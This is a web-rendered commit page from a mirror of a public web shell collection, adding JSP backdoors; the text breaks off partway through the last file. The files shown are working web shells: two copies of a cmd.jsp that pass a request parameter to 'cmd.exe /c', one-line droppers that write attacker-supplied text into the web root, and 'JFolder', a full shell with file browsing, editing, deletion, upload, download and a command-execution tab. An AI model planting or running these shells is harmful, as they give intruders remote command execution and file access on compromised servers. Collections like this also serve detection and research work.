Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-10 05:44:11 +00:00
Code Issues Projects Releases Packages Wiki Activity

update

Browse source 
php shell and jsp shell
This commit is contained in:
tennc 2013-09-13 10:44:57 +08:00
parent 5ba51580de
commit df6d55ad4f
29 changed files with 7756 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3312
jsp/0000.jsp Normal file
View file

File diff suppressed because it is too large Load diff

31
jsp/1.jsp Normal file
View file

@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

31
jsp/102.jsp Normal file
View file

@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

47
jsp/12302.jsp Normal file
View file

@ -0,0 +1,47 @@
<%@page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*"%>
<html>
<head>
<title>JspDo Code By Xiao.3</title>
<style type="text/css">
body { color:red; font-size:12px; background-color:white; }
</style>
</head>
<body>
<%
if(request.getParameter("context")!=null)
{
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");
OutputStream pt = null;
try {
pt = new FileOutputStream(path);
pt.write(context.getBytes());
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='????????????è????°???????????????é??é??!'>????????????!</font></a>");
} catch (FileNotFoundException ex2) {
out.println("<font color='red'>???????¤±è??!</font>");
} catch (IOException ex) {
out.println("<font color='red'>???????¤±è??!</font>");
} finally {
try {
pt.close();
} catch (IOException ex3) {
out.println("<font color='red'>???????¤±è??!</font>");
}
}
}
%>
<form name="frmUpload" method="post" action="">
<font color="blue">????????????è·????:</font><%out.print(request.getRealPath(request.getServletPath())); %>
<br>
<br>
<font color="blue">????????????è·????:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">
<br>
<br>
??????????????????:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
<br>
<br>
<input type="submit" name="btnSubmit" value="Upload">
</form>
</body>
</html>

1
jsp/IXRbE.jsp Normal file
View file

@ -0,0 +1 @@
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx

1
jsp/IXRbE02.jsp Normal file
View file

@ -0,0 +1 @@
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx

993
jsp/data.jsp Normal file
View file

@ -0,0 +1,993 @@
<%
/**
JFolder V0.9 windows platform
@Filename?? JFolder.jsp
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
@Bugs : ?????±??????????????·¨????????
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
String[] strCommand = {"CMD ?ü ??","Command Window"};
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
String[] strHelp = {"°? ?ú","Help"};
String[] strParentFolder = {"????????","Parent Folder"};
String[] strCurrentFolder= {"?±?°????","Current Folder"};
String[] strDrivers = {"?????÷","Drivers"};
String[] strFileName = {"????????","File Name"};
String[] strFileSize = {"?????ó??","File Size"};
String[] strLastModified = {"×??ó????","Last Modified"};
String[] strFileOperation= {"??????×÷","Operations"};
String[] strFileEdit = {"????","Edit"};
String[] strFileDown = {"????","Download"};
String[] strFileCopy = {"????","Move"};
String[] strFileDel = {"????","Delete"};
String[] strExecute = {"????","Execute"};
String[] strBack = {"·???","Back"};
String[] strFileSave = {"±???","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows?????????????????ù????????
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M ????5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("?????ó???? 0 ×???????????????°?");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("?????????? "+strPath+"<p>");
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("???????? ??"+strPath+"<p>");
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>??????????</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" ???????¨?§°?");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" ???????¨?§°?");
}
else
{
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("?·?¨?????????? "+file+" ????"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JSP Shell ·?°??????ú</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; ???ê??
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>???????????÷</p>
<p>&nbsp;&nbsp;&nbsp; jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
<p>??windows??cmd??</p>
<p>&nbsp;</p>
<p>????????</p>
<p>&nbsp;&nbsp;&nbsp;<b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
<p>&nbsp;</p>
<p>?????ü??????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ??????jsp&nbsp;???ò?????????ò???????????????????????ò</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="????">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
